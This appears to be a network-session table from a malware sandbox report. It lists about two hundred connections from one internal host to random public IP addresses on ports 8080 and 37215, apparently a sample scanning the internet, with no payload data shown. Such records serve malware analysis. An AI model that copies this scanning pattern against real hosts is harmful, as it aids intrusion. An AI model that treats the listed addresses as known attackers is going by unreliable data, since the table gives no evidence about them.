                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6276192.168.2.2355852134.217.126.2398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6277192.168.2.2348406114.65.109.1838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6278192.168.2.233508274.47.141.1728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6279192.168.2.2333920188.248.235.1118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6280192.168.2.233729413.37.26.1118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6281192.168.2.2342874188.230.26.1608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6282192.168.2.234224838.174.179.1258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6283192.168.2.235400278.101.214.588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6284192.168.2.234029680.12.88.1588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6285192.168.2.2345558128.103.66.1178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6286192.168.2.233599469.1.30.2098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6287192.168.2.2352684145.58.30.88080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6288192.168.2.2335346159.104.157.988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6289192.168.2.2334586108.65.185.848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6290192.168.2.233932079.1.106.1908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6291192.168.2.235260431.213.110.548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6292192.168.2.2354044140.95.176.478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6293192.168.2.2341576193.46.8.2058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6294192.168.2.234539887.206.50.548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6295192.168.2.2351726171.78.160.428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6296192.168.2.233696280.189.62.628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6297192.168.2.2353218200.209.117.938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6298192.168.2.2339888137.149.178.1848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6299192.168.2.2356870184.9.26.2418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6300192.168.2.2343130151.130.71.1538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6301192.168.2.2335142157.181.101.7537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6302192.168.2.2357282112.198.35.237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6303192.168.2.233657241.248.31.4337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6304192.168.2.235127880.250.78.23837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6305192.168.2.2348634197.160.184.6437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6306192.168.2.2335748116.114.217.25437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6307192.168.2.2344466197.135.197.7237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6308192.168.2.235324012.61.35.17937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6309192.168.2.2360390206.158.198.18737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6310192.168.2.234847241.81.132.19637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6311192.168.2.2334202197.74.152.12837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6312192.168.2.233915241.43.19.20637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6313192.168.2.2349254197.221.213.7537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6314192.168.2.2346002197.58.13.2137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6315192.168.2.2338370197.45.235.23737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6316192.168.2.234899096.78.2.7937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6317192.168.2.2348188186.169.173.20437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6318192.168.2.2351072197.107.184.11637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6319192.168.2.235675060.14.215.7337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6320192.168.2.233711641.189.178.13837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6321192.168.2.234525641.123.36.13837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6322192.168.2.2333562115.159.75.4437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6323192.168.2.234266278.54.44.11837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6324192.168.2.2356440157.238.129.12237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6325192.168.2.233567434.240.24.14937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6326192.168.2.234178642.80.1.24837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6327192.168.2.2356110197.1.13.19937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6328192.168.2.234823641.52.26.4837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6329192.168.2.2341330177.50.154.8437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6330192.168.2.2349110157.51.175.7137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6331192.168.2.235418875.162.235.137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6332192.168.2.2348486176.119.84.6837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6333192.168.2.233884441.132.218.16437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6334192.168.2.234278841.245.108.537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6335192.168.2.2359372197.89.92.537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6336192.168.2.234882241.243.49.11237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6337192.168.2.2354050157.195.111.7637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6338192.168.2.2346228197.133.146.12537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6339192.168.2.234238841.74.89.20837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6340192.168.2.2338662197.73.145.7337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6341192.168.2.234403441.154.83.13237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6342192.168.2.233473841.74.111.11337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6343192.168.2.2347952157.0.79.8737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6344192.168.2.233401441.92.173.14337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6345192.168.2.2344306157.234.137.4537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6346192.168.2.2358174197.231.73.21837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6347192.168.2.235466441.0.42.5437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6348192.168.2.2351012157.91.32.6337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6349192.168.2.2352060197.5.236.25137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6350192.168.2.233498041.142.144.10437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6351192.168.2.234001241.18.111.2737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6352192.168.2.2352770193.75.164.21337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6353192.168.2.2351624157.195.14.24337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6354192.168.2.234008220.110.89.2437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6355192.168.2.235726841.228.169.13237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6356192.168.2.2338176201.169.198.9037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6357192.168.2.2355378157.89.192.1637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6358192.168.2.2344664197.69.249.11837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6359192.168.2.2350824157.91.16.14837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6360192.168.2.2357468197.65.51.24437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6361192.168.2.2334182197.221.239.12837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6362192.168.2.2335220197.94.114.7937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6363192.168.2.234888041.38.181.21837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6364192.168.2.2353118197.134.251.13637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6365192.168.2.235050241.23.52.18637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6366192.168.2.2354016197.176.181.4337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6367192.168.2.2353216175.115.35.18737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6368192.168.2.2345796209.97.134.20537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6369192.168.2.2359518157.150.140.10137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6370192.168.2.2333486197.181.216.13037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6371192.168.2.2333046197.232.105.10037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6372192.168.2.235502241.42.88.24537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6373192.168.2.233682032.120.182.25037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6374192.168.2.235419841.38.194.17337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6375192.168.2.2357442143.86.140.20037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6376192.168.2.2344136196.11.243.23637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6377192.168.2.235691841.63.142.10637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6378192.168.2.234710877.115.140.13237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6379192.168.2.235347441.168.41.14837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6380192.168.2.2337904197.108.143.12037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6381192.168.2.233799037.10.83.837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6382192.168.2.2341300197.190.240.2337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6383192.168.2.2334344220.197.156.18037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6384192.168.2.2338950137.232.127.23437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6385192.168.2.234677498.130.103.10337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6386192.168.2.2343898170.198.141.17337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6387192.168.2.2336222197.220.234.10337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6388192.168.2.2347052157.31.96.3837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6389192.168.2.2347184197.80.134.24337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6390192.168.2.2358178197.37.206.14237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6391192.168.2.2358408137.37.153.3637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6392192.168.2.235233241.188.223.4037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6393192.168.2.2344354157.224.208.8937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6394192.168.2.235913841.101.165.7137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6395192.168.2.233721241.56.236.24637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6396192.168.2.2340270157.222.152.4937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6397192.168.2.235560241.137.174.3737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6398192.168.2.2339488157.17.153.21237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6399192.168.2.234537634.90.25.11437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6400192.168.2.2338030212.224.57.18037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6401192.168.2.2357070157.165.232.23737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6402192.168.2.2343234157.24.212.8237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6403192.168.2.235747041.105.170.12537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6404192.168.2.2353128213.107.25.6837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6405192.168.2.2349020130.123.51.23637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6406192.168.2.2344232157.78.202.15637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6407192.168.2.233464241.160.163.22637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6408192.168.2.2339390157.213.185.9037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6409192.168.2.2338340170.193.207.13337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6410192.168.2.235843041.172.127.2837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6411192.168.2.2345686197.144.181.6937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6412192.168.2.2333324130.109.197.12437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6413192.168.2.235474441.76.11.4037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6414192.168.2.2340378153.92.160.4037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6415192.168.2.2332822157.221.21.14537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6416192.168.2.2349090157.73.204.13937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6417192.168.2.2356298159.53.177.13837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6418192.168.2.233724441.112.137.14837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6419192.168.2.234300841.48.114.8837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6420192.168.2.2334020157.142.247.8537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6421192.168.2.2342170157.202.250.1337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6422192.168.2.2339062169.42.31.3937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6423192.168.2.2344628157.217.70.16937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6424192.168.2.2341782197.222.207.10837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6425192.168.2.234888241.0.8.20337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6426192.168.2.2342194104.103.247.6337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6427192.168.2.2341890197.232.158.6137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6428192.168.2.235810834.49.174.14637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6429192.168.2.233652241.17.237.2537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6430192.168.2.2353608197.108.23.16637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6431192.168.2.2355952165.152.99.1437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6432192.168.2.234970841.183.95.22837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6433192.168.2.2336066157.234.243.4437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6434192.168.2.2347760179.132.174.13037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6435192.168.2.2348776157.83.179.20537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6436192.168.2.2358618157.213.61.1537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6437192.168.2.2341120157.17.112.21037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6438192.168.2.2358984111.214.236.9437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6439192.168.2.234760841.171.177.24037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6440192.168.2.2343640157.32.197.5937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6441192.168.2.2350942157.83.24.437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6442192.168.2.235489441.20.89.19237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6443192.168.2.235074041.37.83.24137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6444192.168.2.2349650157.159.230.23137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6445192.168.2.2357056197.248.46.24437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6446192.168.2.2355720157.234.43.1937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6447192.168.2.235712241.110.89.24837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6448192.168.2.235221696.39.206.4137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6449192.168.2.2360544157.41.96.23637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6450192.168.2.235320888.10.64.4737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6451192.168.2.233415441.100.125.18137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6452192.168.2.2359088197.216.41.14537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6453192.168.2.235636241.237.140.25237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6454192.168.2.235818823.143.222.21937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6455192.168.2.2347698157.249.205.10537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6456192.168.2.234913492.140.254.8837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6457192.168.2.235087841.19.153.20537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6458192.168.2.2351978197.55.60.6237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6459192.168.2.2355512157.234.69.19437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6460192.168.2.2358234157.170.239.23537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6461192.168.2.234898053.53.71.13237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6462192.168.2.2346474157.207.211.2137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6463192.168.2.2345540197.16.81.11137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6464192.168.2.233808874.78.221.13037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6465192.168.2.2349092134.145.185.1337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6466192.168.2.2333136130.242.141.537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6467192.168.2.2359412157.49.50.9937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6468192.168.2.2353870197.1.103.13637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6469192.168.2.2348292157.101.49.13237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6470192.168.2.2352036197.124.172.12937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6471192.168.2.235090892.90.221.2637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6472192.168.2.2349082207.72.28.2428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6473192.168.2.2351006108.208.237.1068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6474192.168.2.2335680160.36.234.1868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6475192.168.2.2345628210.185.227.2228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6476192.168.2.2344184178.232.203.2388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6477192.168.2.235675468.19.129.858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6478192.168.2.2350402175.130.181.858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6479192.168.2.233896495.5.217.358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6480192.168.2.2333208173.217.115.348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6481192.168.2.2344450142.145.8.2078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6482192.168.2.233326063.100.92.1068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6483192.168.2.2344730180.190.57.918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6484192.168.2.2333256191.170.27.208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6485192.168.2.2336382107.165.79.158080
